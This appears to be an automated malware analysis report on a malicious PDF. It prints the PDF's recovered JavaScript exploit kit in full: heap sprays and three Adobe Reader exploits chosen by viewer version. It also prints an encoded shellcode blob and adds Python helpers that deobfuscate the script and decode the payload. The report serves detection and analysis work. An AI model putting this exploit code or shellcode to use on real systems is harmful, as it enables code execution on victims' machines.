Malicious PDF — malware analysis report

Static analysis result for SHA-256 38c9f3e2817c5e06…

MALICIOUS

PDF

118.0 KB Created: 2009-12-21 16:55:35 +08:00 Authoring application: Acrobat PDFMaker 7.0 via Acrobat Distiller 7.0 (Windows) (the /Creator string is followed by a run of 0xFF bytes and a fragment of the raw /Producer entry) First seen: 2026-05-11
MD5: f49c3e766c351dbd91e971acbd0b23b8 SHA-1: fba956d8cfb577d5467086649152391e2402a852 SHA-256: 38c9f3e2817c5e062eff64f513b784f5adf8874a1886ddd3d2af2603c4da5fce
372 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution; T1059.007 JavaScript. The recovered script is Acrobat JavaScript driving three Reader exploits and contains no PowerShell, so T1059.001 does not apply to this sample.

The PDF file was flagged as malicious by an ML classifier with high confidence, and the heuristics show why: its single /JS stream holds a version-keyed exploit kit for Adobe Reader. The obfuscation is light. Once the XX-to-%u marker substitution and the \xNN-escaped method names are undone the script is fully readable: it reads app.viewerVersion and selects Collab.collectEmailInfo (CVE-2007-5659) for Reader 6.x and 7.x, Collab.getIcon (CVE-2009-0927) for 8.x, or media.newPlayer (CVE-2009-4324) for 9.1 and later and for 8.x builds above 8.102, each preceded by a heap spray, and defers the exploit with app.setTimeOut when the document is opened inside a browser (this.external). Viewers older than 6.0 are sent into while(1){}. The shellcode is carried inline in the variable s, %u-encoded, rather than fetched; what it does once it runs was not determined statically in this report.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9982

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
     var ret = unescape("%u0c0c%u0c0c");
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All seven URLs below are XMP/RDF schema namespace URIs from the document's metadata packet and are labelled as document text only; none is reached by the JavaScript, so this report records no network indicator for the sample.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
    • http://ns.adobe.com/pdf/1.3/ (in PDF document text)
    • http://ns.adobe.com/pdfx/1.3/ (in PDF document text)
    • http://ns.adobe.com/xap/1.0/ (in PDF document text)
    • http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
    • http://purl.org/dc/elements/1.1/ (in PDF document text)
    • http://ns.adobe.com/photoshop/1.0/ (in PDF document text)
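Two of the heuristics above are cheap to reproduce by hand: the duplicate-object check (PDF_DUPLICATE_OBJ_BODY_INCREMENTAL) and the need to inflate a /FlateDecode stream before JavaScript inside it becomes readable (the javascript_obj0043_000.js artifact listed under Extracted artifacts is such a still-compressed stream). The walker below is an added example, not the analyser's own code; SAMPLE_PDF is a constructed file in which object 43 is defined twice, first with an empty stream and then with a compressed stream carrying one of the API calls the report flags. The object numbers and the API names are taken from this report; everything else about the file is made up for the demonstration.

```python
import re
import zlib

# Added example, not the analyser's own code: a minimal PDF object walker that
# reproduces two of the checks above on a constructed file. It keeps every
# definition of an object number, so "N G obj" defined twice with different
# bodies is reported together with what a first-wins and a last-wins parser
# would each resolve, and it inflates /FlateDecode streams so JavaScript hidden
# behind the filter is visible.

OBJ_RE = re.compile(rb"(?<![0-9])(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
STREAM_KW = re.compile(rb"(?<![a-z])stream")          # the keyword, not "endstream"
LEN_RE = re.compile(rb"/Length\s+(\d+)(?!\s+\d+\s+R)")  # ignore indirect /Length n g R
DANGEROUS_APIS = (b"media.newPlayer", b"Collab.getIcon", b"Collab.collectEmailInfo")

# Constructed sample (not the analysed file): object 43 first carries an empty
# stream, then later in the file a compressed stream with one of the API calls
# the report flags. A first-wins reader sees "()", a last-wins reader sees JS.
JS_SOURCE = b"try {this.media.newPlayer(null);} catch(e) {}"
COMPRESSED = zlib.compress(JS_SOURCE)
SAMPLE_PDF = b"".join([
    b"%PDF-1.4\n",
    b"1 0 obj\n<</Type/Catalog/OpenAction<</S/JavaScript/JS 43 0 R>>>>\nendobj\n",
    b"43 0 obj\n<</Length 2>>\nstream\n()\nendstream\nendobj\n",
    b"43 0 obj\n<</Length %d/Filter[/FlateDecode]>>\nstream\n" % len(COMPRESSED),
    COMPRESSED,
    b"\nendstream\nendobj\n%%EOF\n",
])


def parse_objects(data):
    """Every 'n g obj ... endobj' body in file order, keyed by (n, g); duplicates are kept."""
    objs = {}
    for m in OBJ_RE.finditer(data):
        objs.setdefault((int(m.group(1)), int(m.group(2))), []).append(m.group(3))
    return objs


def stream_payload(body):
    """Decoded bytes of the object's stream, or b'' if it has none.

    /Length is trusted only when it lands on the endstream keyword (malicious
    files lie about it); otherwise the keyword is used. FlateDecode data is
    inflated with a decompressobj so a truncated stream still yields its prefix."""
    kw = STREAM_KW.search(body)
    if kw is None:
        return b""
    dict_part, start = body[:kw.start()], kw.end()
    if body.startswith(b"\r\n", start):
        start += 2
    elif body.startswith(b"\n", start):
        start += 1
    m = LEN_RE.search(dict_part)
    if m and body[start + int(m.group(1)):].lstrip().startswith(b"endstream"):
        raw = body[start:start + int(m.group(1))]
    else:                                   # missing or lying /Length: use the keyword
        end = body.rfind(b"endstream")
        if end < start:
            return b""
        raw = body[start:end].rstrip(b"\r\n")
    if b"/FlateDecode" not in dict_part:
        return raw
    d = zlib.decompressobj()
    try:
        return d.decompress(raw) + d.flush()
    except zlib.error:
        return raw


def is_active(body):
    """True when the object is or references JavaScript: a /JS or /JavaScript key,
    or one of the Acrobat APIs from the CVE rules inside its decoded stream."""
    payload = stream_payload(body)
    return (b"/JavaScript" in body or b"/JS" in body
            or any(api in payload for api in DANGEROUS_APIS))


def triage(data):
    """Duplicate definitions (with both resolutions) and every JavaScript-bearing body."""
    objs = parse_objects(data)
    report = {"objects": len(objs), "duplicates": {}, "javascript": []}
    for key, bodies in objs.items():
        if len(bodies) > 1 and len(set(bodies)) > 1:
            report["duplicates"][key] = {
                "first_wins": stream_payload(bodies[0]),
                "last_wins": stream_payload(bodies[-1]),
                "active": any(is_active(b) for b in bodies),   # what raises the severity
            }
        for idx, body in enumerate(bodies):
            if is_active(body):
                report["javascript"].append((key, idx, stream_payload(body)))
    return report


if __name__ == "__main__":
    r = triage(SAMPLE_PDF)
    for (num, gen), d in r["duplicates"].items():
        print(f"{num} {gen} obj defined more than once, active content: {d['active']}")
        print("  first-wins resolves to:", d["first_wins"])
        print("  last-wins resolves to: ", d["last_wins"])
    for key, idx, payload in r["javascript"]:
        print("JavaScript in", key, "definition", idx, "->", payload[:48])
```

The walker is deliberately regex-based rather than a full parser: that is the point of the duplicate-object heuristic, since two conforming readers can already disagree on which body of object 43 is live, and a triage tool has to show both rather than pick one. Run it on a real file with `triage(open(path, "rb").read())`; the bodies it returns are what to hand to the script-level decoding shown further down.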

Extracted artifacts 5

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0043_000.js | pdf-javascript-stream | PDF /JS object 43 at offset 0x2430 | 2172 bytes
SHA-256: 6a4feff50242ca48bccb7b8303874c63d44c492cea43499d20ce94d354dc031d
Preview script
First 1,000 lines of the extracted script
<</Length 2116/Filter[/FlateDecode]>>stream
[2116 bytes of zlib-compressed stream body omitted: not printable. This artifact is object 43 as it sits in the file, dictionary plus compressed body, carved before the /FlateDecode filter was applied; javascript_obj0043_001.js below is the same stream inflated.]
endstrea
javascript_obj0043_001.js | pdf-javascript-stream | PDF /JS object 43 at offset 0x2465 | 6463 bytes
SHA-256: 72a7a81874bc825243697fb1380a9dc969da68bf826f90ff5241fdd360dd07a9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function urpl(sc){
	var keyu= "%u";
	var re = /XX/g;
	sc = sc.replace(re,keyu);
	return sc;
}

function xxsc(sc){
	var sprdataxx = "XX4a4bXX4647";
	var esprpl=unescape;
	var urpled = esprpl(urpl(sc));
	var blknum = 0x41000;
	var sprdata = esprpl(urpl(sprdataxx));
	while(sprdata.length<blknum)
		sprdata+=sprdata;
	sprblk=sprdata.substring(0,sprdata.length);
	scblk=urpled.substring(0,urpled.length);
	memory=new Array();
	var k = 0;
	while (k < 200)
	{
		memory[k]=sprblk+scblk;
		k++;
	}
}

function repeat(count,what){
	var v = "";
	while (--count >= 0) v += what;
	return v;
}

var s = "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"


function exp8() {
	var spd = "XX000aXX000aXX000aXX000a";
	var esc = unescape;
	var spr = esc(urpl(spd));

	var of = repeat(4096, spr);
	var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
		Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}

function exp9() {	
	var esprpl=unescape;
	var sc = esprpl(urpl(s));

	var ret = unescape("%u0c0c%u0c0c");
	var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");

	while(ret.length <= 0x8000) ret+=ret;
	ret=ret.substring(0,0x8000 - s.length);
	memory=new Array();

	for(i=0;i<0x2000;i++) {
		memory[i]= ret + sc;
	}

	util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
	util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
	try {this.media.newPlayer(null);} catch(e) {}
	util.printd(sc2, new Date());

}

function start() 
{
	var esprpl=unescape;
	var sc = esprpl(urpl(s));

	if (app.viewerVersion >= 7.0)
	{
		plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
	} 
	else 
	{
		ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
		plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
		+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
		while ((plin.length % 8) != 0) 
		plin = unescape("%u4141") + plin;

		plin += repeat(2626,ef6);
	}
	if (app.viewerVersion >= 6.0)
	{
	  var a=[];//javascript for adobe
	  Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
	}
}


var ver = app.viewerVersion

if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
	var inBrowser = this.external;
	if (inBrowser)
		var shaft = app.setTimeOut("exp9()",1200);
	else
		exp9();	
}
else
{
	if(ver >= 8.0)
	{
		xxsc(s);

		var inBrowser = this.external;
		if (inBrowser)
			var shaft = app.setTimeOut("exp8()",1200);
		else
			exp8();
	}
	else 
	{
		if(ver >= 6.0)
		{
			var inBrowser = this.external;
			if (inBrowser)
				var shaft = app.setTimeOut("start()",1200);
			else
				start();
		}
		else
		{
			while(1){};
		}
	}
}
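The script above hides almost nothing once three generic transforms are applied: the XX carrier marker is put back to %u (the script's own urpl()), %u literals are turned into the bytes they occupy in memory, and the \xNN-escaped bracket calls are turned back into plain method names. The helper below is an added example, not the analyser's code; SAMPLE is a constructed excerpt quoting the script's carrier string, its escaped Collab calls and its sc2 literal, and CVE_BY_API repeats the mapping from the heuristics section. It also reproduces the version gate, because the branch a given app.viewerVersion takes is not obvious from the nested if/else.

```python
import re

# Added example, not the analyser's own code: the generic transforms behind the
# PDF_GENERIC_STAGE_RECOVERY rule, applied to the script above. SAMPLE is a
# constructed excerpt of that script (its XX carrier marker, its \xNN-escaped
# method names and its sc2 literal are quoted from it); CVE_BY_API repeats the
# mapping from the heuristics section.
SAMPLE = r'''
var spd = "XX000aXX000aXX000aXX000a";
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
try {this.media.newPlayer(null);} catch(e) {}
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
'''
SC2 = "%u0c0c" * 8 + (
    "%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c"
    "%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569")
CVE_BY_API = {
    "Collab.collectEmailInfo": "CVE-2007-5659",
    "Collab.getIcon": "CVE-2009-0927",
    "media.newPlayer": "CVE-2009-4324",
}
HEX_ESC = re.compile(r"(?:\\x[0-9a-fA-F]{2})+")
BRACKET_CALL = re.compile(r'(\w+)\["([A-Za-z_]\w*)"\]')


def undo_markers(js, marker="XX"):
    """Reverse the script's urpl(): every XX inside a carrier string stands for %u."""
    return js.replace(marker, "%u")


def js_unescape(s):
    """Bytes a JS unescape() literal occupies in memory: each %uXXXX (or %XX) is one
    UTF-16 code unit stored little-endian, which is what a heap spray relies on."""
    out, pos = bytearray(), 0
    for m in re.finditer(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", s):
        out += s[pos:m.start()].encode("utf-16-le")          # literal text between escapes
        out += int(m.group(1) or m.group(2), 16).to_bytes(2, "little")
        pos = m.end()
    out += s[pos:].encode("utf-16-le")
    return bytes(out)


def reveal(js):
    """Turn "\\x67\\x65..." runs back into text and obj["name"] into obj.name."""
    plain = HEX_ESC.sub(lambda m: bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1"), js)
    return BRACKET_CALL.sub(r"\1.\2", plain)


def called_apis(js):
    """Acrobat API calls visible once the names are de-escaped, each with its CVE (or None)."""
    names = set(re.findall(r"\b(?:Collab|media|util|app)\.\w+", reveal(js)))
    return {n: CVE_BY_API.get(n) for n in sorted(names)}


def branch_for(viewer_version):
    """The function and API the script's version gate selects for app.viewerVersion."""
    v = viewer_version
    if v >= 9.1 or 8.102 < v < 9.0:
        return "exp9", "media.newPlayer"
    if v >= 8.0:
        return "exp8", "Collab.getIcon"
    if v >= 6.0:
        return "start", "Collab.collectEmailInfo"
    return "hang", None                       # while(1){}: older viewers just spin


if __name__ == "__main__":
    print(called_apis(SAMPLE))
    print(js_unescape(undo_markers("XX000aXX000aXX000aXX000a")).hex())
    sc2 = js_unescape(SC2)
    print(len(sc2), "bytes:", sc2[:16].hex(), sc2[16:])
    for v in (6.0, 7.0, 8.0, 8.103, 9.0, 9.1, 9.2):
        print(v, branch_for(v))
```

Two things worth noticing in the output. js_unescape(SC2) is exactly 72 bytes, sixteen 0x0c bytes followed by ASCII letters, which is the size of the shellcode_00.bin artifact listed below: that carve is the string exp9() hands to util.printd(), not the payload in s. And branch_for(9.0) returns the Collab.getIcon path, because the gate tests `ver >= 9.1` and `8.102 < ver < 9.0`, so a viewer reporting exactly 9.0 falls through to the 8.x exploit.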
javascript_obj0043_001_shellcode_00.bin | pdf-js-shellcode, pdf-js-unescape-shellcode | recovered from PDF /JS object 43 at offset 0x2465 | 72 bytes
72 bytes is exactly the 36-word sc2 literal in exp9() (eight %u0c0c words followed by 28 words of ASCII letters), which the script passes to util.printd() after the media.newPlayer() call. The actual stage is the %u-encoded payload in the variable s; see generic_stage_recovery_000.js below.
SHA-256: 1d18be7a9a735b4efb9816cbf36ca8f2995fa7e3951c97e5ce9977168aa1280b
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (marker XX-to-%u) from combined JavaScript objects at offset 0x2430 | 5838 bytes
SHA-256: 16ae11897d85015a75a4476aa5d780ff0fb25880746f1a6e954a1c4f5329200c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
%u23eb%u4840%u5f43%u5b57%u8b66%u3c03%u7430%u2c1b%uc063%u04e0%uec80%u8043%u0fe4%uc402%uea34%u0788%u4343%ueb47%ue8e3%uffd8%uffff%u4e69%u4963%u4d71%u4571%u4d71%u4d71%u4d6b%u4563%u4d71%u4d71%u4d71%u4d71%u446e%u4e69%u4463%u4967%u4d72%u4d6d%u4d71%u4463%u4d70%u4f72%u526b%u4364%u4d72%u4963%u506a%u4c71%u4971%u4967%u4571%u4366%u4f6c%u4a67%u446a%u4a6c%u4866%u4464%u506a%u4a64%u4871%u476c%u4566%u4b63%u4c6c%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4f67%u4c64%u4e6f%u4d6c%u516b%u4e67%u4d70%u4d71%u4d71%u4d71%u4469%u4d6d%u4971%u4469%u4d6c%u4972%u4a67%u4469%u4d6d%u4571%u4669%u4c69%u4a65%u4d72%u4d6d%u4d71%u4964%u4a69%u4468%u5268%u4d72%u4d6d%u4d71%u4c70%u4665%u4e68%u4f71%u4563%u506f%u4e71%u4d71%u4d71%u4c69%u5065%u5171%u4b63%u4f64%u4964%u4c70%u4d65%u4c70%u4b66%u4f6b%u4368%u476e%u4c65%u4469%u4c68%u4665%u4d72%u4d6d%u4d71%u4f6b%u4469%u4f71%u4f6b%u4470%u4d66%u516c%u5171%u4f6d%u4f6d%u4463%u5164%u4669%u4c68%u4e63%u4d72%u4d6d%u4d71%u4c70%u4f64%u4a68%u4d71%u4d6f%u4d71%u4d71%u4463%u4c72%u436b%u4d71%u4f6e%u4864%u4c6a%u4e65%u4d72%u4d6d%u4d71%u4c69%u4564%u4864%u516c%u5171%u4470%u5265%u506c%u4671%u4f6d%u4e69%u4764%u4d71%u4d72%u4d71%u4d71%u4b6c%u5263%u4669%u4c68%u4666%u4d72%u4d6d%u4d71%u4469%u4563%u5271%u4d71%u4571%u4d71%u4d71%u4d6e%u436b%u4d6d%u4864%u4c6a%u4668%u4d72%u4d6d%u4d71%u4669%u4c69%u4e66%u4d72%u4d6d%u4d71%u4c71%u5265%u4669%u4c69%u5266%u4d72%u4d6d%u4d71%u436b%u4d71%u436b%u4d71%u436b%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u4a68%u4d72%u4d6d%u4d71%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4a69%u4468%u4a66%u4d72%u4d6d%u4d71%u4469%u4c6a%u4666%u4d72%u4d6d%u4d71%u4a69%u4c69%u5068%u4e72%u4d6d%u4d71%u4d6e%u4f6e%u436b%u4d71%u506e%u526e%u4f6e%u4b6e%u4864%u4c68%u4e63%u4d72%u4d6d%u4d71%u4864%u4c67%u5268%u4d72%u4d6d%u4d71%u4471%u4d65%u526c%u4b71%u4463%u4d6b%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4469%u4f71%u4a70%u526f%u4d6e%u516d%u4f6d%u516c%u4971%u4469%u4c68%u4666%u4d72%u4d6d%u4d71%u4f6d%u4663%u446e%u4864%u4864%u4864%u
4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4c70%u4665%u4368%u4364%u4464%u4964%u4a64%u4463%u4571%u4469%u4f71%u4470%u4b65%u516c%u4f71%u4f6d%u4e6d%u4470%u4a65%u4b6c%u5164%u4c69%u4f65%u5171%u4469%u4468%u5266%u4d72%u4d6d%u4d71%u4668%u4d71%u5071%u4d71%u4d71%u5167%u4b63%u4a64%u4469%u4468%u4e66%u4d72%u4d6d%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u4864%u4c68%u5266%u4d72%u4d6d%u4d71%u4c65%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u436b%u4d71%u4864%u4c6a%u4665%u4d72%u4d6d%u4d71%u4c65%u4d6b%u4469%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c71%u4f6c%u4970%u4469%u4f6c%u456c%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4f6e%u4469%u476d%u4572%u4469%u4f6c%u4d6f%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c70%u4d65%u4c70%u4b66%u4f6e%u4469%u4f70%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4967%u4570%u4d63%u516c%u5071%u4e65%u4365%u4a71%u4c71%u4d66%u4463%u5164%u4470%u5072%u516c%u4671%u476e%u4c69%u4f65%u5171%u466d%u516c%u5270%u4463%u4966%u476e%u4469%u4f66%u476e%u446f%u4f6e%u4d6f%u446f%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4e66%u4363%u4c71%u4f6e%u516f%u4c71%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4871%u5068%u4b71%u4e65%u4d63%u4b71%u4c71%u4f6d%u4972%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4469%u4d71%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4669%u5071%u4463%u4e71%u476e%u4e6b%u4c65%u3030"


The rest of this preview (exp8, exp9, start and the version gate) is identical to the script shown above for javascript_obj0043_001.js, with the XX markers already replaced by %u.
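The %u blob at the top of this preview is the tail of the variable s, and it is not a downloader stub: its first 21 words (42 bytes) are a small x86 decoder, everything after them is the payload encoded as pairs of letters, and the blob ends in %u3030, the "0" the decoder stops on. Read as bytes, the stub is `eb 23` (jump to a `call` whose pushed return address is the payload start), then a loop of `mov ax,[ebx]; cmp al,'0'; je out; sub al,'c'; shl al,4; sub ah,'C'; and ah,0x0f; add al,ah; xor al,0xea; mov [edi],al; inc ebx; inc ebx; inc edi`. The decoder below is an added example, not the analyser's code; STAGE is the beginning of the blob exactly as printed above, cut short and closed with the same %u3030 terminator so the sample runs offline (that truncation is constructed, the words themselves are the page's).

```python
import re

# Added example, not the analyser's own code: emulate the decoder stub that
# opens the recovered stage above and decode the payload that follows it.
# STAGE is the first 40 %u words of that blob as printed on this page, closed
# with the %u3030 terminator the full blob ends with (constructed truncation).
STAGE = ("%u23eb%u4840%u5f43%u5b57%u8b66%u3c03%u7430%u2c1b%uc063%u04e0%uec80%u8043%u0fe4"
         "%uc402%uea34%u0788%u4343%ueb47%ue8e3%uffd8%uffff"
         "%u4e69%u4963%u4d71%u4571%u4d71%u4d71%u4d6b%u4563%u4d71%u4d71%u4d71%u4d71"
         "%u446e%u4e69%u4463%u4967%u4d72%u4d6d%u4d71"
         "%u3030")


def words_to_bytes(s):
    """%uXXXX words become the little-endian byte pairs they occupy in memory."""
    return b"".join(int(w, 16).to_bytes(2, "little") for w in re.findall(r"%u([0-9a-fA-F]{4})", s))


def stub_length(code):
    """The stub opens with 'jmp short' to a 'call' whose pushed return address is
    the payload start, so the payload begins right after that 5-byte call."""
    if code[0] != 0xEB:
        raise ValueError("not the expected jmp-short stub")
    call_at = 2 + code[1]
    if code[call_at] != 0xE8:
        raise ValueError("jmp target is not a call")
    return call_at + 5


def decode_alnum_stage(encoded):
    """Emulate the stub's loop (stub offsets 8 to 36, as disassembled above):
    two input chars per output byte, al = first char, ah = second char;
    a '0' in al ends the payload; al = ((al - 'c') << 4) + ((ah - 'C') & 0x0f),
    then al ^= 0xea is stored and both pointers advance."""
    out = bytearray()
    for i in range(0, len(encoded) - 1, 2):
        lo, hi = encoded[i], encoded[i + 1]
        if lo == 0x30:                      # cmp al,'0' ; je
            break
        al = ((lo - 0x63) << 4) & 0xFF      # sub al,'c' ; shl al,4
        ah = (hi - 0x43) & 0x0F             # sub ah,'C' ; and ah,0x0f
        out.append(((al + ah) & 0xFF) ^ 0xEA)   # add al,ah ; xor al,0xea ; mov [edi],al
    return bytes(out)


def recover(stage_literal):
    """Split the blob into stub and payload and return (stub, decoded payload)."""
    code = words_to_bytes(stage_literal)
    n = stub_length(code)
    return code[:n], decode_alnum_stage(code[n:])


if __name__ == "__main__":
    stub, payload = recover(STAGE)
    print("stub   :", stub.hex())
    print("decoded:", payload.hex())
```

On the excerpt the first 19 decoded bytes are `81 ec 00 08 00 00 60 e8 00 00 00 00 5b 81 eb ac 10 40 00`, i.e. `sub esp,0x800; pushad; call $+5; pop ebx; sub ebx,0x4010ac`, the usual position-independent prologue of shellcode compiled from C. Feeding recover() the whole blob as printed above yields the complete payload; whether it then drops a file or reaches out over the network is not something this static report determines, which is why the second-stage question stays open above.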
combined_document_js_000.js | deobfuscated-js | combined document JavaScript streams at offset 0x2430 | 8636 bytes
SHA-256: 6b274891890bf0d519e3384adb17e8bb7394a4452b3b364e01a340896daea0d1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
The first 2172 bytes of this artifact are the still-compressed javascript_obj0043_000.js (the dictionary <</Length 2116/Filter[/FlateDecode]>>stream followed by the zlib body, not printable), and the remainder is the script shown above for javascript_obj0043_001.js, verbatim.